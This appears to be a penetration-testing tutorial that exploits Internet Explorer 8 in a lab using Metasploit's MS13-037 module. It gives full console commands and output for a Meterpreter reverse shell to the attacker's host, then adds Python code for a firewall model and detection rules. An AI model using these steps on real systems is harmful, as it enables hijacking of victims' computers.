Exploitation: Client-side Attack
This is part of a series of posts that walk through an attack. To start from the beginning, click here.
In the last post, we performed some basic reconnaissance on our target machine and determined its operating system, running services, and even what browser was used. In this part, we’ll set up a client-side attack and gain access to our target machine.
Client-side attacks have become one of the most common ways to compromise a machine. They differ from server-side attacks in that they target software the user runs, such as a web browser, document reader, or mail client, and they require some user interaction (visiting a page, opening a file) to trigger the exploit. Phishing, where the sender poses as a legitimate entity the receiver trusts in order to entice them into clicking a malicious link or opening a malicious attachment, is the classic delivery method for a client-side attack.
We’ll explore setting up a malicious website that hosts our client-side attack, which is easily accomplished on Kali using Metasploit. Recall from our scenario that the target machine, Victim, has joined our “free wireless network”, which we fully control. That means we also control DNS and can resolve any hostname Victim requests to a server of our choosing, which is how a victim on a rogue network ends up on an attacker-controlled page without ever typing a suspicious address. In this walkthrough we’ll browse to the attacker’s IP address directly; the DNS redirect is what would get a real victim there.
Metasploit: MS13-037
The Metasploit Framework (MSF) is an amazing collection of exploits and payloads wrapped in an easy to use command line interface. There exists a free community-driven version and a commercial paid version. We’ll be using the free version in Kali to set up our client-side attack.
Since we know that Victim is running Internet Explorer 8, a very old browser, we’ll look for a client-side attack that targets it. After some research, we learn about MS13-037, a Microsoft cumulative security update for Internet Explorer that addressed several vulnerabilities, including CVE-2013-2551. The CVE database describes this as a “use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 [that] allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object.” That wording is Microsoft’s generic advisory language; the bug itself, demonstrated by VUPEN at Pwn2Own 2013, is an integer overflow in the COALineDashStyleArray object of Internet Explorer’s VML (Vector Markup Language) code, which is how the Metasploit module we’ll use below describes it.
This sounds like something we can use. Let’s see if Metasploit has an available exploit. We prepare Metasploit for first use by following the instructions from the Kali website. Open a terminal window and type msfconsole to start up the Metasploit Framework console.
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...
http://metasploit.pro
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.10.0-2014102901 [core:4.10.0.pre.2014102901 api:1.0.0]]
+ -- --=[ 1369 exploits - 833 auxiliary - 233 post ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
Now let’s search for an MS13-037 exploit by typing search ms13-037.
msf > search ms13-037
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
msf >
We’re in luck, Metasploit has an available exploit. Type use exploit/windows/browser/ms13_037_svg_dashstyle to select the exploit and then type show options to view configurable options.
msf > use exploit/windows/browser/ms13_037_svg_dashstyle
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms13_037_svg_dashstyle) >
This module starts a web server that delivers the exploit and payload to any vulnerable browser that visits it, so the options above are all about how that server is exposed. We’ll leave most of them at their defaults but change SRVPORT to 80 (the port our Attacker machine listens on; using the standard HTTP port keeps a port number out of the link, and we can bind it because msfconsole is running as root) and URIPATH to clickme (the path at which the exploit is served; the default is a random string). Type set SRVPORT 80 and set URIPATH clickme, then show options to confirm the changes.
msf exploit(ms13_037_svg_dashstyle) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_037_svg_dashstyle) > set URIPATH clickme
URIPATH => clickme
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
Next, let’s look at the exploit target. It is currently set to Automatic, meaning the module picks a target from the visiting browser’s User-Agent and its fingerprinting JavaScript, but I’ve found that this doesn’t always work. Let’s see what targets are available by typing show targets, pick one explicitly with set target followed by its Id, and type show options again to confirm the change.
msf exploit(ms13_037_svg_dashstyle) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 IE 8 on Windows 7 SP1 with JRE ROP
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > set target 2
target => 2
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) >
We set target to 2 because target 1 builds its ROP chain out of a DLL shipped with an older Java Runtime Environment (JRE) that was not compiled with ASLR support, so it only works if Java is installed on Victim, and it isn’t. Target 2 instead first leaks the address of ntdll.dll from the browser to defeat ASLR and then builds the ROP chain from ntdll.dll itself, which every Windows process has loaded. So far so good; now let’s set up the payload that will run once the exploit succeeds. Type show payloads to view a list of payloads compatible with this exploit.
msf exploit(ms13_037_svg_dashstyle) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager
windows/dllinject/bind_tcp_rc4 normal Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_hop_http normal Reflective DLL Injection, Reverse Hop HTTP Stager
windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dllinject/reverse_tcp_rc4 normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_tcp_rc4_dns normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution
windows/download_exec normal Windows Executable Download (http,https,ftp) and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/bind_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
windows/meterpreter/reverse_hop_http normal Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_https_proxy normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/meterpreter/reverse_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
windows/meterpreter/reverse_tcp_rc4_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/bind_tcp_rc4 normal Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupdllinject/reverse_tcp_rc4 normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
windows/patchupdllinject/reverse_tcp_rc4_dns normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager
windows/patchupmeterpreter/bind_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
windows/patchupmeterpreter/reverse_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
windows/patchupmeterpreter/reverse_tcp_rc4_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/bind_tcp_rc4 normal Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
windows/shell/reverse_hop_http normal Windows Command Shell, Reverse Hop HTTP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell/reverse_tcp_rc4 normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
windows/shell/reverse_tcp_rc4_dns normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_hidden_bind_tcp normal Windows Command Shell, Hidden Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/bind_tcp_rc4 normal Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
windows/upexec/reverse_hop_http normal Windows Upload/Execute, Reverse Hop HTTP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/upexec/reverse_tcp_rc4 normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
windows/upexec/reverse_tcp_rc4_dns normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/bind_tcp_rc4 normal VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
windows/vncinject/reverse_hop_http normal VNC Server (Reflective Injection), Reverse Hop HTTP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
windows/vncinject/reverse_tcp_rc4 normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
windows/vncinject/reverse_tcp_rc4_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
msf exploit(ms13_037_svg_dashstyle) >
Wow, so many options! My personal favorite has always been the Windows Meterpreter (Reflective Injection), Reverse TCP Stager. Meterpreter is an amazing payload that provides a whole host of options. From the Metasploit Unleashed tutorial:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
I like the Reverse TCP Stager because of the direction of the connection. With a reverse payload, the small stager that runs inside Internet Explorer on Victim connects out to a handler listening on our Attacker machine, and the full Meterpreter stage is sent back to Victim over that connection. Host firewalls such as Windows Firewall allow outbound connections by default and block only unsolicited inbound ones, so Victim’s own firewall lets this connection through. A Bind TCP Stager works the other way round: the payload opens a listening port on Victim and waits for us to connect in from Attacker. That inbound connection is exactly what a default-deny-inbound firewall blocks, so a bind payload would most likely never reach us. The reverse payload’s weak spot is egress filtering, which is why the list above also contains HTTP and HTTPS stagers that can ride over ports 80 and 443.
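To make the firewall argument concrete, here is an added example (my own code, not from the original post or from Metasploit) that models a stateful host firewall with Windows Firewall’s default profile policy of blocking unsolicited inbound connections and allowing outbound ones, and runs both stager styles through it. The addresses and ports are the walkthrough’s (Attacker 10.0.1.10, Victim 10.0.1.11, LPORT 4444); the policy model itself is an assumption for illustration, not the real implementation. It also goes one step beyond the text by showing what egress filtering does to a reverse_tcp payload.

```python
"""
Toy stateful host firewall, modelled on Windows Firewall's default profile
policy (block unsolicited inbound, allow all outbound). Addresses and ports
follow the walkthrough: Attacker 10.0.1.10, Victim 10.0.1.11, LPORT 4444.
The policy model is an assumption for illustration, not the real implementation.
"""
from dataclasses import dataclass

ATTACKER = "10.0.1.10"
VICTIM = "10.0.1.11"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False  # True only for the first packet of a new TCP connection


class HostFirewall:
    """Connection-tracking firewall in front of `host`.

    - a packet that belongs to an already tracked flow is allowed in either direction
    - a new inbound connection is dropped unless its port is explicitly opened
    - a new outbound connection is allowed, unless egress filtering limits the ports
    """

    def __init__(self, host, inbound_open_ports=(), egress_allow_ports=None):
        self.host = host
        self.inbound_open_ports = set(inbound_open_ports)
        self.egress_allow_ports = egress_allow_ports  # None means allow every outbound port
        self.tracked = set()

    @staticmethod
    def _flow(p):
        # order-independent key so both directions of one connection match
        return frozenset({(p.src, p.sport), (p.dst, p.dport)})

    def filter(self, p):
        if self._flow(p) in self.tracked:
            return "ALLOW (established)"
        if not p.syn:
            return "DROP (no matching connection)"
        if p.dst == self.host:  # unsolicited inbound
            if p.dport in self.inbound_open_ports:
                self.tracked.add(self._flow(p))
                return "ALLOW (inbound rule)"
            return "DROP (inbound default deny)"
        if p.src == self.host:  # outbound
            if self.egress_allow_ports is None or p.dport in self.egress_allow_ports:
                self.tracked.add(self._flow(p))
                return "ALLOW (outbound)"
            return "DROP (egress filter)"
        return "DROP (not addressed to or from this host)"


def bind_tcp(fw):
    """bind_tcp: the payload listens on Victim:4444 and the Attacker must connect in."""
    return fw.filter(Packet(ATTACKER, 51000, VICTIM, 4444, syn=True))


def reverse_tcp(fw, lport=4444):
    """reverse_tcp: the stager on Victim connects out to Attacker:LPORT, and the
    Meterpreter stage comes back over that same flow."""
    outbound = fw.filter(Packet(VICTIM, 49328, ATTACKER, lport, syn=True))
    stage = fw.filter(Packet(ATTACKER, lport, VICTIM, 49328))
    return outbound, stage


if __name__ == "__main__":
    print("default policy, bind_tcp:         ", bind_tcp(HostFirewall(VICTIM)))
    print("default policy, reverse_tcp:      ", reverse_tcp(HostFirewall(VICTIM)))
    egress = HostFirewall(VICTIM, egress_allow_ports={80, 443})
    print("egress-filtered, reverse_tcp 4444:", reverse_tcp(egress))
    print("egress-filtered, reverse_tcp 443: ", reverse_tcp(egress, lport=443))
```

The bind scenario dies on the first SYN; the reverse scenario’s stage traffic is allowed only because the outbound SYN created a tracked flow. Restricting egress to 80 and 443 blocks reverse_tcp on 4444, but a handler on 443 (or one of the reverse_http/reverse_https stagers in the payload list) walks straight through, so egress port filtering raises the bar without settling the matter.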
All that said, let’s go ahead and use this payload by typing set payload windows/meterpreter/reverse_tcp. Then type show options to see what payload options are configurable.
msf exploit(ms13_037_svg_dashstyle) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) >
We’ll just configure LHOST, the address the payload connects back to; it must be an address on our Attacker machine that Victim can reach, so we set it to 10.0.1.10 by typing set LHOST 10.0.1.10. LPORT, the port our handler listens on, can stay at its default of 4444. Type show options once more to review everything before executing the exploit.
msf exploit(ms13_037_svg_dashstyle) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 10.0.1.10 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) >
Looks like everything’s configured just the way we wanted. Let’s create the malicious website and serve the payload by typing exploit.
msf exploit(ms13_037_svg_dashstyle) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.10:4444
[*] Using URL: http://0.0.0.0:80/clickme
[*] Local IP: http://10.0.1.10:80/clickme
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) >
Now on our Victim machine we browse to the URL Metasploit created, http://10.0.1.10/clickme, and see what happens. (In our rogue-network scenario, DNS control is what would deliver Victim here under a legitimate-looking hostname; for the walkthrough we simply type the address.)
From the screenshot above, we can see that Victim was redirected to a second, randomly named URL and the page stays blank as if it’s still loading something. Eventually, Internet Explorer crashes.
So what happened? Did our exploit fail? Let’s check our Metasploit console.
msf exploit(ms13_037_svg_dashstyle) >
[*] 10.0.1.11 ms13_037_svg_dashstyle - Requesting: /clickme
[*] 10.0.1.11 ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 10.0.1.11 ms13_037_svg_dashstyle - Requesting: /clickme/XssWuvigzg?RvtqQ=1996386480
[*] 10.0.1.11 ms13_037_svg_dashstyle - Using ntdll ROP
[*] 10.0.1.11 ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 1 opened (10.0.1.10:4444 -> 10.0.1.11:49328) at 2014-11-11 20:22:21 -0600
[*] Session ID 1 (10.0.1.10:4444 -> 10.0.1.11:49328) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1828
[+] Successfully migrated to process
This looks promising! The Metasploit output above logs what happened when Victim browsed to our malicious page: the first request was answered with the info-leak page, the browser was sent on to a second URL that delivered the actual trigger using the ntdll ROP chain, the Meterpreter stage was sent, and a session was opened. Immediately after that, the module’s default InitialAutoRunScript, migrate -f, spawned a notepad.exe process in the background (the user never sees a window) and moved Meterpreter into it. The reason is that an exploit like this corrupts the target application’s memory, so Internet Explorer often crashes or is closed shortly afterwards; a session running inside iexplore.exe would die with it, whereas one living in a fresh notepad.exe survives.
A quick look at the Windows Task Manager confirms that Notepad is running in the background with PID 1828, matching the Metasploit output. It is also running as user eric, which means our session has eric’s privileges rather than SYSTEM; that matters for what we can do later.
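Turning this around for the defender, here is an added example (my own code, not from the original post) of host-side checks that would have caught what the Task Manager shows. The records are constructed: the PIDs 3852, 1828 and 2936, the user eric and the 10.0.1.10:4444 connection come from the walkthrough, while the parent PIDs, the svchost.exe entry and the TIME_WAIT entry are assumptions added to give the rules something to ignore.

```python
"""
Host-side checks for the post-exploitation pattern in the walkthrough:
a browser spawning notepad.exe, Meterpreter migrating into it, and the
migrated process holding the reverse-TCP session. Records are constructed;
PIDs 3852/1828/2936 and the 10.0.1.10:4444 session are from the post,
parent PIDs and benign entries are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Process:
    pid: int
    name: str
    ppid: int
    user: str


@dataclass(frozen=True)
class Conn:
    pid: int
    raddr: str
    rport: int
    state: str


USER = "WIN-FDN9DNVQ5IR\\eric"

# Constructed process list, in the shape of `tasklist` plus parent PIDs.
PROCESSES = [
    Process(1200, "explorer.exe", 600, USER),
    Process(3852, "iexplore.exe", 1200, USER),   # the exploited browser
    Process(1828, "notepad.exe", 3852, USER),    # spawned by 'migrate -f'
    Process(2936, "cmd.exe", 1828, USER),        # Meterpreter 'shell' command
    Process(800, "svchost.exe", 600, "NT AUTHORITY\\NETWORK SERVICE"),
]

# Constructed connection table, in the shape of `netstat -ano`.
CONNECTIONS = [
    Conn(1828, "10.0.1.10", 4444, "ESTABLISHED"),  # session now owned by notepad.exe
    Conn(3852, "10.0.1.10", 80, "TIME_WAIT"),      # the /clickme fetch
    Conn(800, "10.0.1.1", 443, "ESTABLISHED"),     # benign service traffic
]

NO_NETWORK_PROCESSES = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
COMMON_OUTBOUND_PORTS = {80, 443, 53, 25, 587, 993, 995, 445, 3389}


def _by_pid(procs):
    return {p.pid: p for p in procs}


def network_from_non_network_process(procs, conns):
    """A process that never needs a socket holds a live TCP session: the
    footprint of 'migrate' into notepad.exe."""
    by_pid = _by_pid(procs)
    hits = []
    for c in conns:
        p = by_pid.get(c.pid)
        if p and p.name.lower() in NO_NETWORK_PROCESSES and c.state == "ESTABLISHED":
            hits.append(f"{p.name} (pid {p.pid}) -> {c.raddr}:{c.rport}")
    return hits


def suspicious_parent_child(procs):
    """A browser spawning a non-browser child (IE8 only spawns iexplore.exe tab
    processes), or a viewer/editor spawning a shell."""
    by_pid = _by_pid(procs)
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        pn, cn = parent.name.lower(), p.name.lower()
        if pn in BROWSERS and cn not in BROWSERS:
            hits.append(f"{parent.name} ({parent.pid}) spawned {p.name} ({p.pid})")
        elif pn in NO_NETWORK_PROCESSES and cn in SHELLS:
            hits.append(f"{parent.name} ({parent.pid}) spawned shell {p.name} ({p.pid})")
    return hits


def unusual_outbound_port(conns, common=COMMON_OUTBOUND_PORTS):
    """Weak signal on its own: 4444 is only Metasploit's default LPORT and is
    trivially changed by the attacker."""
    return [f"pid {c.pid} -> {c.raddr}:{c.rport}"
            for c in conns if c.state == "ESTABLISHED" and c.rport not in common]


def audit(procs=PROCESSES, conns=CONNECTIONS):
    return {
        "no_network_process_with_socket": network_from_non_network_process(procs, conns),
        "suspicious_parent_child": suspicious_parent_child(procs),
        "unusual_outbound_port": unusual_outbound_port(conns),
    }


if __name__ == "__main__":
    for rule, hits in audit().items():
        for hit in hits:
            print(f"[{rule}] {hit}")
```

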